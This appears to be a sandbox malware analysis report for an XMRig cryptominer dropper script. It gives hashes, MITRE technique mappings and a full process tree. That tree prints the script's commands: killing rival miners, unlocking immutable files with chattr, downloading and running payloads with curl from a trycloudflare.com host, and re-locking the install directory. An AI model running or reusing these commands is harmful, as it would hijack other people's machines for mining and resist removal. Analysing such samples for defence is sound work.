xmrig | 40ae63b1ffcb46225bde34c0c6a8dbc8a8cca0b19755143cfe1c1ed7575bf681

Analysis

max time kernel
43s
max time network
39s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
28/12/2024, 02:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

40ae63b1ffcb46225bde34c0c6a8dbc8a8cca0b19755143cfe1c1ed7575bf681.sh
Size

3KB
MD5

03cfaa6e131dd4ea1c7807517d4376d6
SHA1

d21b174325a36f93d7703ea4d3b79ef0a1acca07
SHA256

40ae63b1ffcb46225bde34c0c6a8dbc8a8cca0b19755143cfe1c1ed7575bf681
SHA512

d75a5963f4e8d831d0284b927292141dde345d76ea5c15f2d448cf99f3b9175f6e3752dc68cae03a3e6f73e0046c54005593cb7305eb1e25a290be8db0dcbcd9

Score

10^/10

xmrig defense_evasion discovery miner

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral3/files/fstream-1.dat	family_xmrig
behavioral3/files/fstream-1.dat	xmrig

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

File and Directory Permissions Modification 1 TTPs 3 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
950	chmod
951	chmod
922	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/usr/lib/secure/udiskssd	952	udiskssd
/usr/lib/secure/atdb	955	atdb

Attempts to change immutable files 3 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
908	chattr
958	chattr
960	chattr

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/679/cmdline	pgrep
File opened for reading	/proc/24/status	pgrep
File opened for reading	/proc/78/cmdline	pgrep
File opened for reading	/proc/22/status	pgrep
File opened for reading	/proc/156/cmdline	pgrep
File opened for reading	/proc/392/cmdline	pgrep
File opened for reading	/proc/filesystems	pgrep
File opened for reading	/proc/7/status	pgrep
File opened for reading	/proc/341/status	pgrep
File opened for reading	/proc/712/status	pgrep
File opened for reading	/proc/737/cmdline	pgrep
File opened for reading	/proc/116/status	pgrep
File opened for reading	/proc/251/status	pgrep
File opened for reading	/proc/14/cmdline	pgrep
File opened for reading	/proc/856/status	pgrep
File opened for reading	/proc/709/cmdline	pgrep
File opened for reading	/proc/10/cmdline	pgrep
File opened for reading	/proc/72/cmdline	pgrep
File opened for reading	/proc/709/cmdline	pgrep
File opened for reading	/proc/679/cmdline	pgrep
File opened for reading	/proc/690/status	pgrep
File opened for reading	/proc/20/cmdline	pgrep
File opened for reading	/proc/156/cmdline	pgrep
File opened for reading	/proc/76/status	pgrep
File opened for reading	/proc/710/status	pgrep
File opened for reading	/proc/37/cmdline	pgrep
File opened for reading	/proc/78/status	pgrep
File opened for reading	/proc/24/cmdline	pgrep
File opened for reading	/proc/2/cmdline	pgrep
File opened for reading	/proc/72/status	pgrep
File opened for reading	/proc/708/cmdline	pgrep
File opened for reading	/proc/9/status	pgrep
File opened for reading	/proc/690/status	pgrep
File opened for reading	/proc/712/status	pgrep
File opened for reading	/proc/76/cmdline	pgrep
File opened for reading	/proc/176/status	pgrep
File opened for reading	/proc/filesystems	pgrep
File opened for reading	/proc/10/cmdline	pgrep
File opened for reading	/proc/19/status	pgrep
File opened for reading	/proc/5/status	pgrep
File opened for reading	/proc/176/status	pgrep
File opened for reading	/proc/709/cmdline	pgrep
File opened for reading	/proc/16/status	pgrep
File opened for reading	/proc/339/status	pgrep
File opened for reading	/proc/21/status	pgrep
File opened for reading	/proc/71/cmdline	pgrep
File opened for reading	/proc/156/cmdline	pgrep
File opened for reading	/proc/679/status	pgrep
File opened for reading	/proc/376/cmdline	pgrep
File opened for reading	/proc/37/status	pgrep
File opened for reading	/proc/80/cmdline	pgrep
File opened for reading	/proc/126/cmdline	pgrep
File opened for reading	/proc/20/status	pgrep
File opened for reading	/proc/704/status	pgrep
File opened for reading	/proc/22/cmdline	pgrep
File opened for reading	/proc/679/status	pgrep
File opened for reading	/proc/17/status	pgrep
File opened for reading	/proc/116/cmdline	pgrep
File opened for reading	/proc/22/cmdline	pgrep
File opened for reading	/proc/343/cmdline	pgrep
File opened for reading	/proc/4/cmdline	pgrep
File opened for reading	/proc/116/status	pgrep
File opened for reading	/proc/339/cmdline	pgrep
File opened for reading	/proc/680/cmdline	pgrep

System Network Configuration Discovery 1 TTPs 1 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
784	pgrep

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/��@@pH~@8	sh

/tmp/40ae63b1ffcb46225bde34c0c6a8dbc8a8cca0b19755143cfe1c1ed7575bf681.sh
/tmp/40ae63b1ffcb46225bde34c0c6a8dbc8a8cca0b19755143cfe1c1ed7575bf681.sh
1⤵
PID:712
- /usr/bin/pgrep
  pgrep -x solr
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:718
- /usr/bin/pgrep
  pgrep -x bwmupdate
  2⤵
  PID:727
- /usr/bin/pgrep
  pgrep -x kdevtmpfsi
  2⤵
  - Reads runtime system information
  PID:730
- /usr/bin/pgrep
  pgrep -x kinsing
  2⤵
  PID:734
- /usr/bin/pgrep
  pgrep -x xmrig
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:737
- /usr/bin/pgrep
  pgrep -x xmrigDaemon
  2⤵
  - Reads CPU attributes
  PID:739
- /usr/bin/pgrep
  pgrep -x xmrigMiner
  2⤵
  - Reads CPU attributes
  PID:741
- /usr/bin/pgrep
  pgrep -x xmrigMinerd
  2⤵
  PID:742
- /usr/bin/pgrep
  pgrep -x xmrigMinerDaemon
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:745
- /usr/bin/pgrep
  pgrep -x xmrigMinerServer
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:747
- /usr/bin/pgrep
  pgrep -x xmrigMinerServerDaemon
  2⤵
  - Reads CPU attributes
  PID:748
- /usr/bin/pgrep
  pgrep -x bash2
  2⤵
  PID:750
- /usr/bin/pgrep
  pgrep -x .network-setup
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:751
- /usr/bin/pgrep
  pgrep -x syshd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:752
- /usr/bin/pgrep
  pgrep -x /usr/.network-setup/config.json
  2⤵
  - Reads runtime system information
  PID:754
- /usr/bin/pgrep
  pgrep -x bashirc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:755
- /usr/bin/pgrep
  pgrep -x masscan
  2⤵
  PID:756
- /usr/bin/pgrep
  pgrep -x cronb.sh
  2⤵
  - Reads runtime system information
  PID:757
- /usr/bin/pgrep
  pgrep -x crond.sh
  2⤵
  - Reads CPU attributes
  PID:758
- /usr/bin/pgrep
  pgrep -x linuxsys
  2⤵
  - Reads runtime system information
  PID:759
- /usr/bin/pgrep
  pgrep -x miner
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:760
- /usr/bin/pgrep
  pgrep -x gitlabw
  2⤵
  PID:761
- /usr/bin/pgrep
  pgrep -x xmp
  2⤵
  PID:762
- /usr/bin/pgrep
  pgrep -x juiceSSH
  2⤵
  PID:763
- /usr/bin/pgrep
  pgrep -x khnug
  2⤵
  - Reads runtime system information
  PID:764
- /usr/bin/pgrep
  pgrep -x Linux2
  2⤵
  - Reads CPU attributes
  PID:765
- /usr/bin/pgrep
  pgrep -x kthreaddi
  2⤵
  - Reads CPU attributes
  PID:766
- /usr/bin/pgrep
  pgrep -x kkssl
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:767
- /usr/bin/pgrep
  pgrep -x cnrig
  2⤵
  - Reads CPU attributes
  PID:768
- /usr/bin/pgrep
  pgrep -x stratum
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:769
- /usr/bin/pgrep
  pgrep -x vscode
  2⤵
  - Reads CPU attributes
  PID:770
- /usr/bin/pgrep
  pgrep -x "runsv puma"
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:771
- /usr/bin/pgrep
  pgrep -x xmrig
  2⤵
  PID:772
- /usr/bin/pgrep
  pgrep -x c3pool
  2⤵
  - Reads CPU attributes
  PID:773
- /usr/bin/pgrep
  pgrep -x kthreaddk
  2⤵
  - Reads runtime system information
  PID:774
- /usr/bin/pgrep
  pgrep -x dbused
  2⤵
  - Reads CPU attributes
  PID:775
- /usr/bin/pgrep
  pgrep -x kdevtmpfsi
  2⤵
  PID:776
- /usr/bin/pgrep
  pgrep -x kinsing
  2⤵
  - Reads CPU attributes
  PID:777
- /usr/bin/pgrep
  pgrep -x supportxmr
  2⤵
  - Reads runtime system information
  PID:778
- /usr/bin/pgrep
  pgrep -x xmr
  2⤵
  PID:779
- /usr/bin/pgrep
  pgrep -x kthreaddw
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:780
- /usr/bin/pgrep
  pgrep -x klibsystem4
  2⤵
  - Reads runtime system information
  PID:781
- /usr/bin/pgrep
  pgrep -x klibsystem5
  2⤵
  PID:782
- /usr/bin/pgrep
  pgrep -x kworkerr
  2⤵
  - Reads CPU attributes
  PID:783
- /usr/bin/pgrep
  pgrep -x ipv6_addrconfd
  2⤵
  - System Network Configuration Discovery
  PID:784
- /usr/bin/pgrep
  pgrep -x ksoftriqd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:785
- /usr/bin/pgrep
  pgrep -x 8a9ed70
  2⤵
  - Reads CPU attributes
  PID:786
- /usr/bin/pgrep
  pgrep -x xmrigMiner
  2⤵
  - Reads CPU attributes
  PID:787
- /usr/bin/pgrep
  pgrep -x kthreaddo
  2⤵
  - Reads runtime system information
  PID:788
- /usr/bin/pgrep
  pgrep -x xssai
  2⤵
  - Reads runtime system information
  PID:789
- /usr/bin/pgrep
  pgrep -x k1.sh
  2⤵
  - Reads CPU attributes
  PID:790
- /usr/bin/pgrep
  pgrep -x base64
  2⤵
  - Reads CPU attributes
  PID:791
- /usr/bin/pgrep
  pgrep -x java-deamon
  2⤵
  - Reads runtime system information
  PID:792
- /usr/bin/pgrep
  pgrep -x up.elf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:793
- /usr/bin/pgrep
  pgrep -x logrotate
  2⤵
  PID:794
- /usr/bin/pgrep
  pgrep -x "\\-bash"
  2⤵
  PID:795
- /usr/bin/pgrep
  pgrep -x b64decode
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:796
- /usr/bin/pgrep
  pgrep -x MCf8
  2⤵
  - Reads runtime system information
  PID:797
- /usr/bin/pgrep
  pgrep -x mysqldd
  2⤵
  - Reads CPU attributes
  PID:799
- /usr/bin/pgrep
  pgrep -x monero
  2⤵
  PID:801
- /usr/bin/pgrep
  pgrep -x sshpass
  2⤵
  - Reads CPU attributes
  PID:803
- /usr/bin/pgrep
  pgrep -x sshexec
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:805
- /usr/bin/pgrep
  pgrep -x attack
  2⤵
  - Reads runtime system information
  PID:807
- /usr/bin/pgrep
  pgrep -x dovecat
  2⤵
  - Reads CPU attributes
  PID:809
- /usr/bin/pgrep
  pgrep -x javae
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:812
- /usr/bin/pgrep
  pgrep -x donate
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:813
- /usr/bin/pgrep
  pgrep -x scan.log
  2⤵
  - Reads CPU attributes
  PID:816
- /usr/bin/pgrep
  pgrep -x xmr-stak
  2⤵
  - Reads CPU attributes
  PID:817
- /usr/bin/pgrep
  pgrep -x crond64
  2⤵
  - Reads CPU attributes
  PID:820
- /usr/bin/pgrep
  pgrep -x /tmp/java
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:821
- /usr/bin/pgrep
  pgrep -x pastebin
  2⤵
  PID:824
- /usr/bin/pgrep
  pgrep -x so.txt
  2⤵
  PID:825
- /usr/bin/pgrep
  pgrep -x "bash -s 3673"
  2⤵
  - Reads runtime system information
  PID:827
- /usr/bin/pgrep
  pgrep -x 8005/cc5
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:829
- /usr/bin/pgrep
  pgrep -x /tmp/system
  2⤵
  PID:832
- /usr/bin/pgrep
  pgrep -x ./cliented
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:833
- /usr/bin/pgrep
  pgrep -x .inis
  2⤵
  PID:836
- /usr/bin/pgrep
  pgrep -x certutil
  2⤵
  - Reads runtime system information
  PID:837
- /usr/bin/pgrep
  pgrep -x excludefile
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:840
- /usr/bin/pgrep
  pgrep -x agettyd
  2⤵
  PID:841
- /usr/bin/pgrep
  pgrep -x kthreaddkk
  2⤵
  PID:844
- /usr/bin/pgrep
  pgrep -x /dev/shm
  2⤵
  - Reads runtime system information
  PID:845
- /usr/bin/pgrep
  pgrep -x /var/tmp
  2⤵
  - Reads CPU attributes
  PID:848
- /usr/bin/pgrep
  pgrep -x ./python
  2⤵
  - Reads runtime system information
  PID:849
- /usr/bin/pgrep
  pgrep -x ./crun
  2⤵
  - Reads runtime system information
  PID:852
- /usr/bin/pgrep
  pgrep -x "bash -s kthreaddk"
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:853
- /usr/bin/pgrep
  pgrep -x ./.
  2⤵
  - Reads runtime system information
  PID:857
- /usr/bin/pgrep
  pgrep -x 118/cf.sh
  2⤵
  - Reads runtime system information
  PID:859
- /usr/bin/pgrep
  pgrep -x ./lin64
  2⤵
  - Reads CPU attributes
  PID:860
- /usr/bin/pgrep
  pgrep -x confluence/install.sh
  2⤵
  - Reads runtime system information
  PID:863
- /usr/bin/pgrep
  pgrep -x unls64.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:867
- /usr/bin/pgrep
  pgrep -x ./system-xfwm4-session
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:869
- /usr/bin/pgrep
  pgrep -x ./httpd
  2⤵
  - Reads runtime system information
  PID:872
- /usr/bin/pgrep
  pgrep -x loligang
  2⤵
  - Reads CPU attributes
  PID:873
- /usr/bin/pgrep
  pgrep -x .6379
  2⤵
  - Reads CPU attributes
  PID:876
- /usr/bin/pgrep
  pgrep -x load.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:878
- /usr/bin/pgrep
  pgrep -x init.sh
  2⤵
  PID:880
- /usr/bin/pgrep
  pgrep -x solr.sh
  2⤵
  - Reads CPU attributes
  PID:881
- /usr/bin/pgrep
  pgrep -x .rsyslogds
  2⤵
  - Reads runtime system information
  PID:883
- /usr/bin/pgrep
  pgrep -x sysDworker
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:884
- /usr/bin/pgrep
  pgrep -x pnscan
  2⤵
  PID:885
- /usr/bin/pgrep
  pgrep -x sysguard
  2⤵
  - Reads CPU attributes
  PID:886
- /usr/bin/pgrep
  pgrep -x solrd
  2⤵
  PID:887
- /usr/bin/pgrep
  pgrep -x polska
  2⤵
  - Reads CPU attributes
  PID:888
- /usr/bin/pgrep
  pgrep -x meminitsrv
  2⤵
  PID:889
- /usr/bin/pgrep
  pgrep -x networkservice
  2⤵
  PID:890
- /usr/bin/pgrep
  pgrep -x sysupdate
  2⤵
  - Reads CPU attributes
  PID:891
- /usr/bin/pgrep
  pgrep -x phpguard
  2⤵
  - Reads CPU attributes
  PID:892
- /usr/bin/pgrep
  pgrep -x phpupdate
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:893
- /usr/bin/pgrep
  pgrep -x networkmanager
  2⤵
  - Reads CPU attributes
  PID:894
- /usr/bin/pgrep
  pgrep -x knthread
  2⤵
  - Reads CPU attributes
  PID:895
- /usr/bin/pgrep
  pgrep -x mysqlserver
  2⤵
  - Reads CPU attributes
  PID:896
- /usr/bin/pgrep
  pgrep -x gitlabkill
  2⤵
  PID:897
- /usr/bin/pgrep
  pgrep -x watchbog
  2⤵
  - Reads runtime system information
  PID:898
- /usr/bin/pgrep
  pgrep -x zgrab
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:899
- /usr/bin/pgrep
  pgrep -x udiskssd
  2⤵
  - Reads CPU attributes
  PID:900
- /bin/ps
  ps -ef
  2⤵
  PID:901
- /bin/grep
  grep atdb
  2⤵
  PID:902
- /bin/grep
  grep -v grep
  2⤵
  PID:903
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:905
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:904
- /usr/bin/id
  id -u
  2⤵
  PID:906
- /usr/bin/id
  id -u
  2⤵
  PID:907
- /usr/bin/chattr
  chattr -ia /usr/lib/secure
  2⤵
  - Attempts to change immutable files
  PID:908
- /bin/rm
  rm -rf /usr/lib/secure
  2⤵
  PID:909
- /bin/mkdir
  mkdir -p /usr/lib/secure
  2⤵
  PID:910
- /bin/chmod
  chmod +w /usr/lib/secure
  2⤵
  PID:911
- /usr/bin/curl
  curl -ks https://throw-shut-discuss-pirates.trycloudflare.com/initd -o /usr/lib/secure/udiskssd
  2⤵
  PID:912
- /bin/chmod
  chmod +x /usr/lib/secure/udiskssd
  2⤵
  - File and Directory Permissions Modification
  PID:922
- /usr/bin/curl
  curl -ks https://throw-shut-discuss-pirates.trycloudflare.com/dbus -o /usr/lib/secure/atdb
  2⤵
  PID:924
- /bin/chmod
  chmod +x /usr/lib/secure/atdb
  2⤵
  - File and Directory Permissions Modification
  PID:950
- /bin/chmod
  chmod +x /usr/lib/secure/atdb /usr/lib/secure/udiskssd
  2⤵
  - File and Directory Permissions Modification
  PID:951
- /bin/sleep
  sleep 3
  2⤵
  PID:953
- /usr/bin/nohup
  nohup /usr/lib/secure/udiskssd
  2⤵
  PID:952
- /usr/lib/secure/udiskssd
  /usr/lib/secure/udiskssd
  2⤵
  - Executes dropped EXE
  PID:952
- /bin/sh
  /bin/sh /usr/lib/secure/udiskssd
  2⤵
  - Writes file to tmp directory
  PID:952
- /bin/sleep
  sleep 3
  2⤵
  PID:956
- /usr/bin/nohup
  nohup /usr/lib/secure/atdb
  2⤵
  PID:955
- /usr/lib/secure/atdb
  /usr/lib/secure/atdb
  2⤵
  - Executes dropped EXE
  PID:955
- /bin/sh
  /bin/sh /usr/lib/secure/atdb
  2⤵
  PID:955
- /usr/bin/chattr
  chattr -ia /usr/lib/secure/atdb
  2⤵
  - Attempts to change immutable files
  PID:958
- /bin/rm
  rm -f /usr/lib/secure/atdb
  2⤵
  PID:959
- /usr/bin/chattr
  chattr +i /usr/lib/secure
  2⤵
  - Attempts to change immutable files
  PID:960
- /bin/chmod
  chmod -w /usr/lib/secure
  2⤵
  PID:961

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/usr/lib/secure/atdb

Filesize
4.7MB

MD5
89282100982e5f4dc24ce6dff1690346

SHA1
610a2ce20b7a81e059c9a79f6da19dd3fbd34fa0

SHA256
ff0e1d1cd4f5cde24a3cb9ad571e92f8fa795aa9b42c829aeaeae2a6b8b020ae

SHA512
0a665e856ffc66eefc3563da31a2b0aac1cc2eb4eba35d9b381282946d72e6bc530552f4e7bfcd3d4dd7a4824f8a566a39b05c57069f506a41d3be65df43e142

Download Submit
/usr/lib/secure/udiskssd

Filesize
7.9MB

MD5
6cde7499e4a86550b1f5d24738d988c3

SHA1
c63f646edfddb4232afa5618e3fac4eee1b4b115

SHA256
e0a4c5dbb6c10b7be03336b4d17ee56401f2a29263683093b8cd19c813acad37

SHA512
982f63cd157d6f42e28ca2368e056301966be73924032fb2ecff780fc658b4ab279f27219e324046279344a6f99e2f92e2e2daafc8de4490f77eaf0cca4dd1fa

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads